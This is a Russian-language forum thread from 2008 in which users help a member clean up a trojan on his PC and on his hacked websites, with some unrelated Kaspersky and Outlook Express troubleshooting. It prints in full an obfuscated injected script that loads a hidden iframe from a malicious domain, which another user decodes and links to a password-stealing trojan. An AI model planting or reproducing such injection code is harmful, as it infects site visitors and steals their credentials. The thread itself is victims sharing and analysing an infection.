Троян с "Вечной жизнью"

[NoAdmin]

н-даа и по каким помойкам Вас носило....новье (хорошо, что это решаемо)

 

Где только не носило

Все это скорее всего от взломанного ПО скачанного с инета.

[akoK]

Может и от сайта зараженного, от ПО только одну версию можно получить, а через инет только актуальные новинки.

 

P>S> Все уехало в вирлаб.

[NoAdmin]

Может и от сайта зараженного, от ПО только одну версию можно получить, а через инет только актуальные новинки.

Логично. На днях "взломали/украли пароли/др.варианты" мои сайты

В корневой директории и в директории форума все файлы были модифицированы добавлением к конце страницы следующего кода:

 

<script type="text/javascript">

document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0074\u006f\u006d\u0061\u006b\u0061\u0079\u0061\u006e\u002e\u0062\u0069\u007a\u002f\u0061\u0066\u0074\u0065\u0072\u0066\u0074\u0070\u0063\u0068\u0065\u006b\u002f\u0030\u0031\u0030\u0034\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');

</script>

 

 

И у меня еще проблема:

В C:\Documents and Settings\Admin (основной пользователь) время от времени появляется файл WIN.EXE , вирусов вроде нет, в процессы не лезет, я его удаляю, а он снова...

win.rar

 

Восстановление значка "Свернуть все окна":

Создай текстовый файл и туда скопируй:

 

[shell]

Command=2

IconFile=explorer.exe,3

[Taskbar]

Command=ToggleDesktop

 

После сохраняй как Свернуть все окна.scf

А лучше пользуйтесь WinKey+D - проще

Изменено 4 апреля, 2008 пользователем NoAdmin

[Vsoft]

Скиньте вредоноса мне в ЛС .

[akoK]

win.exe - Trojan.Win32.Agent.jjh

[NoAdmin]

win.exe - Trojan.Win32.Agent.jjh

 

KIS отдыхает

 

Осталось найти путь его появления. Поможете?

[akoK]

Почему, это по версии касперского.

[NoAdmin]

Почему, это по версии касперского.

У меня KIS 7.0.0.125 de с базами от 4.04.08 8:20 - не определяет

а с базами 4.04.08 19:22 - определяет, Убедили!

Изменено 4 апреля, 2008 пользователем NoAdmin

[vidocq89]

В корневой директории и в директории форума все файлы были модифицированы добавлением к конце страницы следующего кода:

<script type="text/javascript">

document.write('\u003c\u......');

</script>

 

хм... расшифровываться как:

<iframe src=http://atomakayan*.biz*/afterftpchek/0104/index.php width=1 height=1 style="display:none"></iframe>

и грузиться в теории этот файл:

atomakayan.biz/my/load***.exe

(звездочки в код я вставил специально, что бы никто нечаянно не сделал контрл+с и контрл+в и ентер. т.е код - без них)))

 

 

файл (если верить касперу - сейчас лень было качать и ковырять) - пинч обыкновенный....

Изменено 4 апреля, 2008 пользователем vidocq89

[NoAdmin]

- Пропали значки "Спам", "Не спам" в Outlook Express

 

Удаление KIS и повторная установка - результат не дали.

Изменено 5 апреля, 2008 пользователем NoAdmin

[akoK]

файл (если верить касперу - сейчас лень было качать и ковырять) - пинч обыкновенный....

Пинч...значит пароли тю-тю...необходимо менять.

 

baseeopiq32.dll - Trojan.Win32.SubSys.ca

[NoAdmin]

Пинч...значит пароли тю-тю...необходимо менять.

 

Да последнее время только этим и занимаемся! Спасибо!

 

 

- Пропали значки "Спам", "Не спам" в Outlook Express

 

Обновление KIS 7.0.0125 до 7.0.1.325 - ситуацию не исправило

[JIABP]

Обновление KIS 7.0.0125 до 7.0.1.325 - ситуацию не исправило

Добро пожаловать на форум! У меня была похожая проблема. Непомню как решил, но попропую посоетовать то, что делал я сам. Для начала Настройки-> Антиспам-> "Включить поддержку MS Outlook и т.д." и "Открывать Диспетчер писем при получении почты" галки снимаем. Далее ставим по умолчанию в панели управения почтовый клиент офис аутлук (если есть МС Офис), перезагружаемся. Потом ставим обратно галки в каспере которые сняли ранее, ставим обратно почтовый клиент по умолчанию аутлук экспресс, и запускаем его и смотрим.

[NoAdmin]

Добро пожаловать на форум!

Спасибо!

 

Снял птицы в KIS

Открыл Оутлук Офис - установил почтой по умолчанию

Перезагрузка ОС

Установил птицы в KIS

Открыл Оутлук Экспресс - установил почтой по умолчанию

Перезагрузил

 

Безрезультатно

 

Помогло только:

Удалить Касперского утилитой http://http://forum.kasperskyclub.ru/index...ost&id=4321 и снова установите 325ю или новее

Вопрос снят

 

Всем Спасибо

Изменено 5 апреля, 2008 пользователем NoAdmin

[JIABP]

NoAdmin, поздравляю с решением проблемы! = ) Но ссылка которую Вы дали ведёт на главную страницу = ( Можно конкретную линку?

 

P.S. Спасибо, буду знать как лечить данную траблу в будущем = )